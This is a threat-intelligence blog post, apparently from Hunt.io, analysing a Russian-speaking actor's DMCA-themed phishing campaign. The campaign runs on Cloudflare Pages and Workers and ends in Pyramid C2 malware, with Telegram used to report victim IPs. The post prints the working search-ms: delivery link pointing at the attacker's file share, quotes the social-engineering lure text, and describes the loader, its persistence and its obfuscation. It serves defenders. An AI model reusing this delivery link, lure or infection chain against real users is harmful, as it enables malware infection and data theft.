Same Russian-Speaking Threat Actor, New Tactics: Abuse of Cloudflare Services for Phishing and Telegram to Filter Victim IPs

In a follow-up to our previously reported activity involving phishing lures impersonating the Electronic Frontier Foundation, Hunt.io researchers have observed a new wave of attacks attributed to the same Russian-speaking threat actor. This recent campaign leverages Cloudflare-branded phishing pages themed around DMCA (Digital Millennium Copyright Act) takedown notices served across multiple domains.

The lure abuses the ms-search protocol to download a malicious LNK file disguised as a PDF via a double extension. Once executed, the malware checks in with an attacker-operated Telegram bot-sending the victim's IP address-before transitioning to Pyramid C2 to control the infected host. This notable shift in tactics is likely due to increased scrutiny following the public spotlight on their activity.

This update covers the phishing lures, infrastructure, and recurring OPSEC lapses-most notably, open directories that continue to expose the actor's operations.

Discovery of Another Open Directory

Readers may remember that in our March 4th post, we used AttackCapture™ to identify the open directory. This time, we'll leverage the File Name feature to search for servers exposing files at the /documents/files/ path covered previously.

On March 24th, Hunt scans identified a new server at 104.245.241[.]157, which showed characteristics consistent with infrastructure previously attributed to the actor. Hosted on the Railnet LLC network, the server exposed ports 22, 80 (open directory), and 443. As we can see in the above screenshot, many of the file names were reused; however, the contents were changed.

Through additional scanning, we identified over 20 domains using the new open directory to download malicious files.

Cloudflare Pages.Dev & Workers.Dev Lures

The domains we observed all consisted of top-level domains of 'workers.dev' or 'pages.dev.' Cloudflare Pages allows developers to deploy static websites directly from repositories, while Workers enables serverless JavaScript execution. Both are commonly used for legitimate purposes but were abused to serve pages impersonating secure document sharing in this case.

Most web pages referenced cgtrader[.]com, an online marketplace for 3D models. As we previously discussed, the actor likely targeted individuals from a specific community, this time with a DMCA takedown notice, possibly attempting to pressure users under the guise of copyright enforcement.

A complete list of the domains we encountered can be found at the end of this post.

Clicking the "Get Document" button initiates the download chain. The page displays a progress message intended to reinforce legitimacy:

"A Windows Explorer window will appear shortly. Click 'Open' and wait for the file to be retrieved from our secure server. Please wait, your document is being prepared. This will take no more than 30 seconds. This is a standard process for fast and safe document access!"

Reviewing the source code of the HTML reveals additional details about the infection chain.

Beneath the interface, the site uses JavaScript to dynamically request a second-stage link from a Cloudflare Workers subdomain ( https[:]//idufgljr[.]procansopa1987[.]workers[.]dev/get-link). The response is a JSON payload containing a search-ms: protocol link:

{"link":"search-ms:query=references.pdf.&crumb=location:%5C%5C213.209.150.191@80%5Cdocuments%5Cfiles&displayname=Network"}

After URL decoding, this becomes:

search-ms:query=references.pdf.&crumb=location:\\213.209.150.191@80\documents\files&displayname=Network

This opens a File Explorer window titled "Network" and performs a search for references.pdf. within the remote share at \\213.209.150[.]191@80\documents\files. During dynamic analysis, we observed a decoy PDF opened in Microsoft Edge while the malicious LNK executes in the background, leading to infection without further user interaction.

The use of search-ms: allows threat actors to proxy requests to malicious content through legitimate system interfaces. While this technique is not new, it continues to evade detection in environments where protocol handlers like search-ms: are not monitored or restricted.

As of publication time, we could not extract additional details about 213.209.150[.]191, but the server plays a role in the attackers' delivery infrastructure.

File Analysis

The core infection chain observed in this campaign mirrors earlier activity attributed to the same actor. Execution begins with a Windows shortcut (.lnk) file masquerading as a PDF. When launched, the LNK executes a PowerShell script to download a ZIP archive from the actor's malicious infrastructure. The archive contains a legitimate python.exe binary alongside a malicious Python script, which is executed to establish communication with Pyramid C2.

While this delivery process remains consistent, several files within the open directory show incremental changes that we will discuss below.

kozlina2.ps1

Out of all the files in the directory, kozlina2.ps1, a PowerShell loader responsible for initiating the second stage of the infection chain, caught our eye. This script is executed by references.pdf.lnk, the initial shortcut file delivered via the search-ms: lure.

Once executed, the script downloads a decoy PDF and ZIP archive from the open directory. The archive contains a legitimate python.exe binary, multiple dependency files, and a Python-based loader. Upon extraction, a shortcut to the Python script, which includes the Pyramid C2 config, is created and copied to the Windows startup folder to maintain persistence across system reboots.

Where things differ is the integration of Telegram. kozlina2.ps1 uses a hardcoded Telegram bot token and chat ID to send the external IP address of the infected host to the attacker using the Bot API. The IP is obtained via a call to the ip-api[.]com service.

Due to the hardcoded credentials, we were able to pivot and gather limited details about the operators behind the channel.

The group title is " ПШ КОД ЗАПУСК", which translates from Russian to "PS CODE LAUNCH"-a likely reference to the kozlina2 script. Using the API metadata, researchers were able to identify the following accounts connected to the group:

• @tyyndrabot - The bot used to receive IP addresses from infected hosts.

• @pups2131 - The group's administrator.

• Skandi - A group member; their role remains unknown at this time.

kursor.py

The ZIP archive retrieved by kozlina.ps1 also contains kursor.py, a Python script functionally consistent with previous iterations covered in our earlier reporting. The script maintains the same role: decoding two configuration blocks that point to Pyramid C2 servers over port 443, including the previously identified 212.87.222[.]84 and the open directory server at 104.245.241[.]157.

Although the overall logic remains the same, the actor introduced an additional obfuscation step to the configuration information. In earlier versions, the configuration was base64-encoded and zlib-compressed, making decoding straightforward with tools like CyberChef.

The updated code now prepends five junk characters to the string before decoding begins. The reason for this is not immediately evident to us, but decoding is the same as the junk string is stripped prior to decoding/decompressing.

Conclusion

This latest activity demonstrates the continued evolution of a previously reported Russian-speaking threat actor. While the overall delivery and malware execution processes remain the same, integrating Telegram-based IP reporting, additional obfuscation of Pyramid C2 configs, and using Cloudflare phishing lures reflect ongoing efforts to evade detection and frustrate analysis.

These incremental changes reinforce the importance of revisiting known tactics and infrastructure over time. Defenders should monitor for abuse of protocol handlers like search-ms: track open directories serving staged payloads, and remain alert to trusted services-such as Telegram and Cloudflare Workers-being used to mask early-stage activity.

Network Observables and Indicators of Compromise (IOCs)

Host Observables and Indicators of Compromise (IOCs)